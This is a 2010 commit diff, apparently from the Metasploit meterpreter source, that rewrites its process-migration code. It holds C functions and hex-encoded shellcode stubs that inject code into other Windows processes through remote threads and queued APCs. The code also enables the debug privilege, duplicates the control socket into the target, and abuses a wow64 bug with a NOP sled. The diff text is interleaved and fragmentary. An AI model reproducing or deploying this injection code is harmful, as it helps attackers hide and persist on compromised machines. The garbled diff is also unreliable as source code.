Complete overhaul of process migration. Migration across x86->x86, x64->x64, wow64->x64 and x64->wow64 all supported using a number of techniques.

git-svn-id: file:///home/svn/framework3/trunk@8198 4d416f70-5f16-0410-b530-b9f4589650da
Stephen Fewer 2010-01-22 19:46:18 +00:00
parent cfcbfd5d3c
commit 4e4a65b9a4
3 changed files with 700 additions and 227 deletions

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@ -1,258 +1,729 @@
#include "common.h" #include "common.h"
#include <Tlhelp32.h>
// Definition of ntdll!NtQueueApcThread
typedef NTSTATUS (NTAPI * NTQUEUEAPCTHREAD)( HANDLE hThreadHandle, LPVOID lpApcRoutine, LPVOID lpApcRoutineContext, LPVOID lpApcStatusBlock, LPVOID lpApcReserved );
// Definitions used for running native x64 code from a wow64 process (see executex64.asm)
typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );
typedef DWORD (WINAPI * EXECUTEX64)( X64FUNCTION pFunction, DWORD dwParameter );
// These are defined in the stdapi projects ps.h file. We should put them somewhere more generic so we dont dup them here.
#define PROCESS_ARCH_X86 1
#define PROCESS_ARCH_X64 2
#define PROCESS_ARCH_IA64 3
// The thee migration techniques currently supported.
// Simple macro's to save some space and clean up the code
#define BREAK_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
#define BREAK_ON_WSAERROR( str ) { dwResult = WSAGetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
// An external reference to the meterpreters main server thread, so we can shutdown gracefully after successfull migration.
extern THREAD * serverThread; extern THREAD * serverThread;
* core_migrate
* ------------
* Migrates the remote connection descriptor into the context of
* another process and exits the current process or thread. This is
* accomplished by duplicating the socket handle into the context
* of another process and injecting a code stub that reads in
* an arbitrary stage that may or may not re-initialize the
* meterpreter server instance in the new process.
* req: TLV_TYPE_MIGRATE_PID - The process identifier to migrate into.
typedef struct _MigrationStubContext
// x86 | x64
// =========================
LPVOID loadLibrary; // esi+0x00 | rbp+0x00
LPVOID payloadBase; // esi+0x04 | rbp+0x08
DWORD payloadLength; // esi+0x08 | rbp+0x10
LPVOID wsaStartup; // esi+0x0c | rbp+0x18
LPVOID wsaSocket; // esi+0x10 | rbp+0x20
LPVOID recv; // esi+0x14 | rbp+0x28
LPVOID setevent; // esi+0x18 | rbp+0x30
LPVOID event; // esi+0x1c | rbp+0x38
CHAR ws2_32[8]; // esi+0x20 | rbp+0x40
WSAPROTOCOL_INFO info; // esi+0x28 | rbp+0x48
} MigrationStubContext;
DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
MigrationStubContext context;
HANDLE token = NULL;
Packet *response = packet_create_response(packet);
HANDLE process = NULL;
HANDLE thread = NULL;
HANDLE event = NULL;
LPVOID dataBase;
LPVOID codeBase;
DWORD threadId;
DWORD pid;
PUCHAR payload;
// Simple trick to get the current meterpreters arch
#ifdef _WIN64 #ifdef _WIN64
BYTE stub[] = DWORD dwMeterpreterArch = PROCESS_ARCH_X64;
"\x48\x89\xCD" // mov rbp, rcx ; rcx = MigrationStubContext *
"\x48\x81\xEC\x00\x40\x00\x00" // sub esp, 0x4000 ; alloc space on stack
"\x49\x89\xE7" // mov r15, rsp ; save pointer to space for WSAStartup
"\x48\x81\xEC\x28\x00\x00\x00" // sub esp, 0x28 ; alloc space for function calls
"\x48\x8D\x4D\x40" // lea rcx, [rbp+0x40] ; rcx = MigrationStubContext->ws2_32
"\xFF\x55\x00" // call qword [rbp+0x0] ; kernel32!LoadLibraryA( "ws2_32" );
"\x4C\x89\xFA" // mov rdx, r15 ;
"\x6A\x02" // push byte +0x2 ;
"\x59" // pop rcx ; rcx = 2
"\xFF\x55\x18" // call qword [rbp+0x18] ; ws2_32!WSAStartup( 2, &buff );
"\x4D\x31\xC0" // xor r8, r8 ; zero r8
"\x41\x50" // push r8 ; null
"\x41\x50" // push r8 ; null
"\x4C\x8D\x4D\x48" // lea r9, [rbp+0x48] ; r9 = &WSAPROTOCOL_INFO
"\x6A\x02" // push byte +0x2 ;
"\x5A" // pop rdx ; rdx = 2
"\x6A\x01" // push byte +0x1 ;
"\x59" // pop rcx ; rcx = 2
"\xFF\x55\x20" // call qword [rbp+0x20] ; ws2_32!WSASocket( 2, 2, 0, &info, 0, 0 );
"\x48\x89\xC7" // mov rdi, rax ; rdi now is our socket
"\x48\x8B\x4D\x38" // mov rcx, [rbp+0x38] ; rcx = the event
"\xFF\x55\x30" // call qword [rbp+0x30] ; kernel32!SetEvent( event );
"\x48\x8B\x45\x08" // mov rax, [rbp+0x8] ; get the main payloads address
"\x48\x81\xE4\xF0\xFF\xFF\xFF" // and esp, 0xfffffff0 ; ensure rsp is 16 byte aligned
"\x48\x89\xE5" // mov rbp, rsp ; give rbp a real value
"\x48\x81\xEC\x28\x00\x00\x00" // sub esp, 0x28 ; alloc some space on stack
"\xFF\xE0"; // jmp rax ; jump into the main payload
#else #else
BYTE stub[] = DWORD dwMeterpreterArch = PROCESS_ARCH_X86;
"\x8B\x74\x24\x04" // mov esi,[esp+0x4] ; ESI = MigrationStubContext *
"\x89\xE5" // mov ebp,esp ; create stack frame
"\x81\xEC\x00\x40\x00\x00" // sub esp, 0x4000 ; alloc space on stack
"\x8D\x4E\x20" // lea ecx,[esi+0x20] ; ECX = MigrationStubContext->ws2_32
"\x51" // push ecx ; push "ws2_32"
"\xFF\x16" // call near [esi] ; call loadLibrary
"\x54" // push esp ; push stack address
"\x6A\x02" // push byte +0x2 ; push 2
"\xFF\x56\x0C" // call near [esi+0xC] ; call wsaStartup
"\x6A\x00" // push byte +0x0 ; push null
"\x6A\x00" // push byte +0x0 ; push null
"\x8D\x46\x28" // lea eax,[esi+0x28] ; EAX = MigrationStubContext->info
"\x50" // push eax ; push our duplicated socket
"\x6A\x00" // push byte +0x0 ; push null
"\x6A\x02" // push byte +0x2 ; push 2
"\x6A\x01" // push byte +0x1 ; push 1
"\xFF\x56\x10" // call near [esi+0x10] ; call wsaSocket
"\x97" // xchg eax,edi ; edi now = our duplicated socket
"\xFF\x76\x1C" // push dword [esi+0x1C] ; push our event
"\xFF\x56\x18" // call near [esi+0x18] ; call setevent
"\xFF\x76\x04" // push dword [esi+0x04] ; push the address of the payloadBase
"\xC3"; // ret ; return into the payload
#endif #endif
// Get the process identifier to inject into
pid = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
// Bug fix for Ticket #275: get the desired length of the to-be-read-in payload buffer... // see '/msf3/external/source/shellcode/x86/migrate/executex64.asm'
context.payloadLength = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_LEN); BYTE migrate_executex64[] = "\x55\x89\xE5\x56\x57\x8B\x75\x08\x8B\x4D\x0C\xE8\x00\x00\x00\x00"
// Receive the actual migration payload (metsrv.dll + loader) // see '/msf3/external/source/shellcode/x64/migrate/remotethread.asm'
payload = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_PAYLOAD); BYTE migrate_wownativex[] = "\xFC\x48\x89\xCE\x48\x89\xE7\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00"
// Try to enable the debug privilege so that we can migrate into system // see '/msf3/external/source/shellcode/x86/migrate/migrate.asm'
// services if we're administrator. BYTE migrate_stub_x86[] = "\xFC\x8B\x74\x24\x04\x81\xEC\x00\x20\x00\x00\xE8\x89\x00\x00\x00"
if (OpenProcessToken( "\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B"
GetCurrentProcess(), "\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C"
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, "\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C"
&token)) "\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B"
// see '/msf3/external/source/shellcode/x64/migrate/migrate.asm'
BYTE migrate_stub_x64[] = "\xFC\x48\x89\xCE\x48\x81\xEC\x00\x20\x00\x00\x48\x83\xE4\xF0\xE8"
// see '/msf3/external/source/shellcode/x86/migrate/apc.asm'
BYTE apc_stub_x86[] = "\xFC\x8B\x44\x24\x04\x55\x89\xE5\xE8\x89\x00\x00\x00\x60\x89\xE5"
// see '/msf3/external/source/shellcode/x64/migrate/apc.asm'
BYTE apc_stub_x64[] = "\xFC\x80\x79\x10\x00\x0F\x85\xF4\x00\x00\x00\xC6\x41\x10\x01\x48"
// We force 64bit algnment for HANDLES and POINTERS in order
// to be cross compatable between x86 and x64 migration.
typedef struct _MIGRATECONTEXT
{ {
privs.PrivilegeCount = 1; HANDLE hEvent;
privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; BYTE bPadding1[8];
} e;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, union
&privs.Privileges[0].Luid); {
LPVOID lpPayload;
BYTE bPadding2[8];
} p;
AdjustTokenPrivileges(token, FALSE, &privs, 0, NULL, NULL); WSAPROTOCOL_INFO info;
// The context used for injection via migrate_via_apcthread
typedef struct _APCCONTEXT
LPVOID lpStartAddress;
BYTE bPadding1[8];
} s;
LPVOID lpParameter;
BYTE bPadding2[8];
} p;
BYTE bExecuted;
// The context used for injection via migrate_via_remotethread_wow64
typedef struct _WOW64CONTEXT
HANDLE hProcess;
BYTE bPadding2[8];
} h;
LPVOID lpStartAddress;
BYTE bPadding1[8];
} s;
LPVOID lpParameter;
BYTE bPadding2[8];
} p;
HANDLE hThread;
BYTE bPadding2[8];
} t;
* Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread
DWORD migrate_via_apcthread( Remote * remote, Packet * response, HANDLE hProcess, DWORD dwProcessID, DWORD dwDestinationArch, LPVOID lpStartAddress, LPVOID lpParameter )
HANDLE hThreadSnap = NULL;
LPVOID lpApcStub = NULL;
LPVOID lpRemoteApcStub = NULL;
LPVOID lpRemoteApcContext = NULL;
LIST * thread_list = NULL;
THREADENTRY32 t = {0};
APCCONTEXT ctx = {0};
DWORD dwApcStubLength = 0;
do do
{ {
// Open the process so that we can into it thread_list = list_create();
if (!(process = OpenProcess( if( !thread_list )
result = GetLastError();
break; break;
ctx.s.lpStartAddress = lpStartAddress;
ctx.p.lpParameter = lpParameter;
ctx.bExecuted = FALSE;
t.dwSize = sizeof( THREADENTRY32 );
// Get the architecture specific apc migration stub...
if( dwDestinationArch == PROCESS_ARCH_X86 )
if( dwMeterpreterArch == PROCESS_ARCH_X64 )
// migrating x64->x86(wow64)
// Our injected APC ends up running in native x64 mode within the wow64 process and as such
// will need a modified stub to transition to wow64 before execuing the apc_stub_x86 stub.
// This issue does not effect x64->x86 injection using the kernel32!CreateRemoteThread method though.
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread. Can't do x64->x86 APC migration yet." )
// migrating x86->x86
lpApcStub = &apc_stub_x86;
dwApcStubLength = sizeof( apc_stub_x86 );
else if( dwDestinationArch == PROCESS_ARCH_X64 )
// migrating x64->x64 (and the same stub for x86(wow64)->x64)
lpApcStub = &apc_stub_x64;
dwApcStubLength = sizeof( apc_stub_x64 );
if( dwMeterpreterArch == PROCESS_ARCH_X86 )
// migrating x86(wow64)->x64
// For now we leverage a bug in wow64 to get x86->x64 migration working, this
// will simply fail gracefully on systems where the technique does not work.
LPVOID lpRemoteAddress = NULL;
BYTE * lpNopSled = NULL;
BYTE bStub[] = "\x48\x89\xC8\x48\xC1\xE1\x20\x48\xC1\xE9\x20\x48\xC1\xE8\x20\xFF\xE0";
// On Windows 2003 x64 there is a bug in the implementation of NtQueueApcThread for wow64 processes.
// The call from a wow64 process to NtQueueApcThread to inject an APC into a native x64 process is sucessful,
// however the start address of the new APC in the native x64 process is not what we specify but instead it is
// the address of the wow64.dll export wow64!Wow64ApcRoutine as found in the wow64 process! We can simple VirtualAlloc
// this address (No ASLR on Windows 2003) and write a simple NOP sled which will jump to our real APC. From there
// injection will continue as normal.
// The registers on the native x64 process after the queued APC is attempted to run:
rip = 000000006B0095F0 // address of wow64!Wow64ApcRoutine as found in the wow64 process
rcx = ( dwApcRoutine << 32 ) | dwApcRoutineContext // (our start address and param)
rdx = dwApcStatusBlock // unused
r8 = dwApcReserved // unused
// On the WOW64 process side:
wow64:000000006B0095F0 ; Exported entry 3. Wow64ApcRoutine
wow64:000000006B0095F0 public Wow64ApcRoutine
// On the native x64 process side:
ntdll:0000000077EF30A0 public KiUserApcDispatcher
ntdll:0000000077EF30A0 mov rcx, [rsp] // 32bit dwApcRoutine and 32bit dwApcRoutineContext into 64bit value
ntdll:0000000077EF30A4 mov rdx, [rsp+8] // 32bit dwApcStatusBlock
ntdll:0000000077EF30A9 mov r8, [rsp+10h] // 32bit dwApcReserved
ntdll:0000000077EF30AE mov r9, rsp
ntdll:0000000077EF30B1 call qword ptr [rsp+18h] // <--- we call the other processes wow64 address for wow64!Wow64ApcRoutine!
// Our bStub:
00000000 4889C8 mov rax, rcx
00000003 48C1E120 shl rcx, 32
00000007 48C1E920 shr rcx, 32
0000000B 48C1E820 shr rax, 32
0000000F FFE0 jmp rax
// alloc the address of the wow64!Wow64ApcRoutine export in the remote process...
// TO-DO: parse the PE64 executable wow64.dll to get this at runtime.
lpRemoteAddress = VirtualAllocEx( hProcess, (LPVOID)0x6B0095F0, 8192, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !lpRemoteAddress )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread. VirtualAllocEx 0x6B0095F0 failed" );
if( VirtualQueryEx( hProcess, lpRemoteAddress, &mbi, sizeof(MEMORY_BASIC_INFORMATION) ) == 0 )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread. VirtualQueryEx failed" );
lpNopSled = (BYTE *)malloc( mbi.RegionSize );
if( !lpNopSled )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread. malloc lpNopSled failed" );
memset( lpNopSled, 0x90, mbi.RegionSize );
if( !WriteProcessMemory( hProcess, lpRemoteAddress, lpNopSled, mbi.RegionSize, NULL ) )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: WriteProcessMemory lpNopSled failed" )
if( !WriteProcessMemory( hProcess, ((BYTE*)lpRemoteAddress + mbi.RegionSize - sizeof(bStub)), bStub, sizeof(bStub), NULL ) )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: WriteProcessMemory bStub failed" )
free( lpNopSled );
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread. Invalid target architecture" )
} }
// If the socket duplication fails... hNtdll = LoadLibraryA( "ntdll" );
if (WSADuplicateSocket(remote_get_fd(remote), pid, & != NO_ERROR) if( !hNtdll )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: LoadLibraryA failed" )
pNtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddress( hNtdll, "NtQueueApcThread" );
if( !pNtQueueApcThread )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: GetProcAddress NtQueueApcThread failed" )
hThreadSnap = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
if( !hThreadSnap )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: CreateToolhelp32Snapshot failed" )
if( !Thread32First( hThreadSnap, &t ) )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: Thread32First failed" )
// Allocate memory for the apc stub and context
lpRemoteApcStub = VirtualAllocEx( hProcess, NULL, dwApcStubLength + sizeof(APCCONTEXT), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !lpRemoteApcStub )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: VirtualAllocEx failed" )
// Simply determine the apc context address
lpRemoteApcContext = ( (BYTE *)lpRemoteApcStub + dwApcStubLength );
dprintf( "[MIGRATE] -- dwMeterpreterArch=%s, lpRemoteApcStub=0x%08X, lpRemoteApcContext=0x%08X", ( dwMeterpreterArch == 2 ? "x64" : "x86" ), lpRemoteApcStub, lpRemoteApcContext );
// Write the apc stub to memory...
if( !WriteProcessMemory( hProcess, lpRemoteApcStub, lpApcStub, dwApcStubLength, NULL ) )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: WriteProcessMemory lpRemoteApcStub failed" )
// Write the apc context to memory...
if( !WriteProcessMemory( hProcess, lpRemoteApcContext, (LPCVOID)&ctx, sizeof(APCCONTEXT), NULL ) )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread: WriteProcessMemory lpRemoteApcContext failed" )
{ {
result = WSAGetLastError(); HANDLE hThread = NULL;
// Only proceed if we are targeting a thread in the target process
if( t.th32OwnerProcessID != dwProcessID )
// Open a handle to this thread so we can do the apc injection
hThread = OpenThread( THREAD_ALL_ACCESS, FALSE, t.th32ThreadID );
if( !hThread )
dprintf("[MIGRATE] migrate_via_apcthread: Trying to inject into thread %d", t.th32ThreadID );
// Only inject into threads we can suspend to avoid synchronization issue whereby the new metsrv will attempt
// an ssl connection back but the client side will not be ready to accept it and we loose the session.
if( SuspendThread( hThread ) != (DWORD)-1 )
list_push( thread_list, hThread );
// Queue up our apc stub to run in the target thread, when our apc stub is run (when the target
// thread is placed in an alertable state) it will spawn a new thread with our actual migration payload.
// Any successfull call to NtQueueApcThread will make migrate_via_apcthread return ERROR_SUCCESS.
if( pNtQueueApcThread( hThread, lpRemoteApcStub, lpRemoteApcContext, 0, 0 ) == ERROR_SUCCESS )
CloseHandle( hThread );
// keep searching for more target threads to inject our apc stub into...
} while( Thread32Next( hThreadSnap, &t ) );
} while( 0 );
if( dwResult == ERROR_SUCCESS )
// Send a successful response to let the ruby side know that we've pretty
// much successfully migrated and have reached the point of no return
packet_transmit_response( ERROR_SUCCESS, remote, response );
// Sleep to give the remote side a chance to catch up...
Sleep( 2000 );
if( thread_list )
// Resume all the threads which we queued our apc into as the remote
// client side will now be ready to handle the new ssl conenction.
while( TRUE )
HANDLE t = (HANDLE)list_pop( thread_list );
if( !t )
ResumeThread( t );
CloseHandle( t );
} }
// Create a notification event that we'll use to know when list_destroy( thread_list );
// it's safe to exit (once the socket has been referenced in }
// the other process)
if (!(event = CreateEvent(NULL, TRUE, FALSE, NULL))) if( hThreadSnap )
CloseHandle( hThreadSnap );
if( hNtdll )
FreeLibrary( hNtdll );
SetLastError( dwResult );
return dwResult;
* Attempt to gain code execution in a native x64 process from a wow64 process by transitioning out of the wow64 (x86)
* enviroment into a native x64 enviroment and accessing the native win64 API's.
* Note: On Windows 2003 the injection will work but in the target x64 process issues occur with new
* threads (kernel32!CreateThread will return ERROR_NOT_ENOUGH_MEMORY). Because of this we filter out
* Windows 2003 from this method of injection, however the APC injection method will work on 2003.
DWORD migrate_via_remotethread_wow64( HANDLE hProcess, LPVOID lpStartAddress, LPVOID lpParameter, HANDLE * pThread )
EXECUTEX64 pExecuteX64 = NULL;
X64FUNCTION pX64function = NULL;
os.dwOSVersionInfoSize = sizeof( OSVERSIONINFO );
if( !GetVersionEx( &os ) )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread_wow64: GetVersionEx failed" )
// filter out Windows 2003
if ( os.dwMajorVersion == 5 && os.dwMinorVersion == 2 )
{ {
result = GetLastError(); SetLastError( ERROR_ACCESS_DENIED );
break; BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread_wow64: Windows 2003 not supported." )
} }
// Duplicate the event handle into the target process // alloc a RWX buffer in this process for the EXECUTEX64 function
if (!DuplicateHandle(GetCurrentProcess(), event, pExecuteX64 = (EXECUTEX64)VirtualAlloc( NULL, sizeof(migrate_executex64), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
process, &context.event, 0, TRUE, DUPLICATE_SAME_ACCESS)) if( !pExecuteX64 )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread_wow64: VirtualAlloc pExecuteX64 failed" )
// alloc a RWX buffer in this process for the X64FUNCTION function (and its context)
pX64function = (X64FUNCTION)VirtualAlloc( NULL, sizeof(migrate_wownativex)+sizeof(WOW64CONTEXT), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !pX64function )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread_wow64: VirtualAlloc pX64function failed" )
// copy over the wow64->x64 stub
memcpy( pExecuteX64, &migrate_executex64, sizeof(migrate_executex64) );
// copy over the native x64 function
memcpy( pX64function, &migrate_wownativex, sizeof(migrate_wownativex) );
// set the context
ctx = (WOW64CONTEXT *)( (BYTE *)pX64function + sizeof(migrate_wownativex) );
ctx->h.hProcess = hProcess;
ctx->s.lpStartAddress = lpStartAddress;
ctx->p.lpParameter = lpParameter;
ctx->t.hThread = NULL;
dprintf( "[MIGRATE] migrate_via_remotethread_wow64: pExecuteX64=0x%08X, pX64function=0x%08X, ctx=0x%08X", pExecuteX64, pX64function, ctx );
// Transition this wow64 process into native x64 and call pX64function( ctx )
// The native function will use the native Win64 API's to create a remote thread in the target process.
if( !pExecuteX64( pX64function, (DWORD)ctx ) )
{ {
result = GetLastError(); SetLastError( ERROR_ACCESS_DENIED );
break; BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread_wow64: pExecuteX64( pX64function, ctx ) failed" )
} }
// Initialize the migration context if( !ctx->t.hThread )
context.loadLibrary = (LPVOID)GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA");
context.wsaStartup = (LPVOID)GetProcAddress(GetModuleHandle("ws2_32"), "WSAStartup");
context.wsaSocket = (LPVOID)GetProcAddress(GetModuleHandle("ws2_32"), "WSASocketA");
context.recv = (LPVOID)GetProcAddress(GetModuleHandle("ws2_32"), "recv");
context.setevent = (LPVOID)GetProcAddress(GetModuleHandle("kernel32"), "SetEvent");
strcpy(context.ws2_32, "ws2_32");
// Allocate storage for the stub and context
if (!(dataBase = VirtualAllocEx(process, NULL, sizeof(MigrationStubContext) + sizeof(stub), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
{ {
result = GetLastError(); SetLastError( ERROR_INVALID_HANDLE );
break; BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread_wow64: ctx->t.hThread is NULL" )
} }
// Bug fix for Ticket #275: Allocate a RWX buffer for the to-be-read-in payload... // Success! grab the new thread handle from of the context
if (!(context.payloadBase = VirtualAllocEx(process, NULL, context.payloadLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE))) *pThread = ctx->t.hThread;
dprintf( "[MIGRATE] migrate_via_remotethread_wow64: Success, hThread=0x%08X", ctx->t.hThread );
} while( 0 );
if( pExecuteX64 )
VirtualFree( pExecuteX64, 0, MEM_DECOMMIT );
if( pX64function )
VirtualFree( pX64function, 0, MEM_DECOMMIT );
return dwResult;
* Attempte to gain code execution in the remote process by creating a remote thread in the target process.
DWORD migrate_via_remotethread( Remote * remote, Packet * response, HANDLE hProcess, DWORD dwDestinationArch, LPVOID lpStartAddress, LPVOID lpParameter )
HANDLE hThread = NULL;
DWORD dwThreadId = 0;
// Create the thread in the remote process. Create suspended in case the call to CreateRemoteThread
// fails, giving us a chance to try an alternative method or fail migration gracefully.
hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, (LPTHREAD_START_ROUTINE)lpStartAddress, lpParameter, CREATE_SUSPENDED, &dwThreadId );
if( !hThread )
{ {
result = GetLastError(); if( dwMeterpreterArch == PROCESS_ARCH_X86 && dwDestinationArch == PROCESS_ARCH_X64 )
break; {
// migrating x86(wow64)->x64, (we expect the call to kernel32!CreateRemoteThread to fail and bring us here).
if( migrate_via_remotethread_wow64( hProcess, lpStartAddress, lpParameter, &hThread ) != ERROR_SUCCESS )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread: migrate_via_remotethread_wow64 failed" )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread: CreateRemoteThread failed" )
} }
// Initialize the data and code base in the target process // Send a successful response to let the ruby side know that we've pretty
codeBase = (PCHAR)dataBase + sizeof(MigrationStubContext); // much successfully migrated and have reached the point of no return
packet_add_tlv_uint( response, TLV_TYPE_MIGRATE_TECHNIQUE, dwTechnique );
packet_transmit_response( ERROR_SUCCESS, remote, response );
if (!WriteProcessMemory(process, dataBase, &context, sizeof(context), NULL)) // Sleep to give the remote side a chance to catch up...
{ Sleep( 2000 );
result = GetLastError();
// Resume the migration thread...
if( ResumeThread( hThread ) == (DWORD)-1 )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_remotethread: ResumeThread failed" )
} while( 0 );
if( hThread )
CloseHandle( hThread );
SetLastError( dwResult );
return dwResult;
* Migrate the meterpreter server from the current process into another process.
DWORD remote_request_core_migrate( Remote * remote, Packet * packet )
Packet * response = NULL;
HANDLE hProcess = NULL;
BYTE * lpPayloadBuffer = NULL;
LPVOID lpMigrateStub = NULL;
LPVOID lpMemory = NULL;
DWORD dwMigrateStubLength = 0;
DWORD dwPayloadLength = 0;
DWORD dwProcessID = 0;
DWORD dwDestinationArch = 0;
response = packet_create_response( packet );
if( !response )
break; break;
// Get the process identifier to inject into
dwProcessID = packet_get_tlv_value_uint( packet, TLV_TYPE_MIGRATE_PID );
// Get the target process architecture to inject into
dwDestinationArch = packet_get_tlv_value_uint( packet, TLV_TYPE_MIGRATE_ARCH );
// Get the length of the payload buffer
dwPayloadLength = packet_get_tlv_value_uint( packet, TLV_TYPE_MIGRATE_LEN );
// Receive the actual migration payload buffer
lpPayloadBuffer = packet_get_tlv_value_string( packet, TLV_TYPE_MIGRATE_PAYLOAD );
dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s, PayloadLength=%d", dwProcessID, ( dwDestinationArch == 2 ? "x64" : "x86" ), dwPayloadLength );
// If we can, get SeDebugPrivilege...
if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
if( AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ) );
dprintf("[MIGRATE] Got SeDebugPrivilege!" );
CloseHandle( hToken );
} }
if (!WriteProcessMemory(process, codeBase, stub, sizeof(stub), NULL)) // Open the process so that we can migrate into it
if( !hProcess )
BREAK_ON_ERROR( "[MIGRATE] OpenProcess failed" )
// Duplicate the socket for the target process
if( WSADuplicateSocket( remote_get_fd( remote ), dwProcessID, & ) != NO_ERROR )
BREAK_ON_WSAERROR( "[MIGRATE] WSADuplicateSocket failed" )
// Create a notification event that we'll use to know when it's safe to exit
// (once the socket has been referenced in the other process)
hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
if( !hEvent )
BREAK_ON_ERROR( "[MIGRATE] CreateEvent failed" )
// Duplicate the event handle for the target process
if( !DuplicateHandle( GetCurrentProcess(), hEvent, hProcess, &ctx.e.hEvent, 0, TRUE, DUPLICATE_SAME_ACCESS ) )
BREAK_ON_ERROR( "[MIGRATE] DuplicateHandle failed" )
// Get the architecture specific process migration stub...
if( dwDestinationArch == PROCESS_ARCH_X86 )
{ {
result = GetLastError(); lpMigrateStub = (LPVOID)&migrate_stub_x86;
break; dwMigrateStubLength = sizeof(migrate_stub_x86);
else if( dwDestinationArch == PROCESS_ARCH_X64 )
lpMigrateStub = (LPVOID)&migrate_stub_x64;
dwMigrateStubLength = sizeof(migrate_stub_x64);
BREAK_ON_ERROR( "[MIGRATE] Invalid target architecture" )
} }
if (!WriteProcessMemory(process, context.payloadBase, payload, context.payloadLength, NULL)) // Allocate memory for the migrate stub, context and payload
lpMemory = VirtualAllocEx( hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !lpMemory )
BREAK_ON_ERROR( "[MIGRATE] VirtualAllocEx failed" )
// Calculate the address of the payload...
ctx.p.lpPayload = ( (BYTE *)lpMemory + dwMigrateStubLength + sizeof(MIGRATECONTEXT) );
// Write the migrate stub to memory...
if( !WriteProcessMemory( hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL ) )
BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 1 failed" )
// Write the migrate context to memory...
if( !WriteProcessMemory( hProcess, ( (BYTE *)lpMemory + dwMigrateStubLength ), &ctx, sizeof(MIGRATECONTEXT), NULL ) )
BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 2 failed" )
// Write the migrate payload to memory...
if( !WriteProcessMemory( hProcess, ctx.p.lpPayload, lpPayloadBuffer, dwPayloadLength, NULL ) )
BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 3 failed" )
// First we try to migrate by directly creating a remote thread in the target process
if( migrate_via_remotethread( remote, response, hProcess, dwDestinationArch, lpMemory, ((BYTE*)lpMemory+dwMigrateStubLength) ) != ERROR_SUCCESS )
{ {
result = GetLastError(); dprintf( "[MIGRATE] migrate_via_remotethread failed, trying migrate_via_apcthread..." );
// If that fails we can try to migrate via a queued APC in the target process
if( migrate_via_apcthread( remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, ((BYTE*)lpMemory+dwMigrateStubLength) ) != ERROR_SUCCESS )
BREAK_ON_ERROR( "[MIGRATE] migrate_via_apcthread failed" )
} }
// Send a successful response to let them know that we've pretty much // Wait at most 15 seconds for the event to be set letting us know that it's finished
// successfully migrated and are reaching the point of no return if( WaitForSingleObjectEx( hEvent, 15000, FALSE ) != WAIT_OBJECT_0 )
packet_transmit_response(result, remote, response); BREAK_ON_ERROR( "[MIGRATE] WaitForSingleObjectEx failed" )
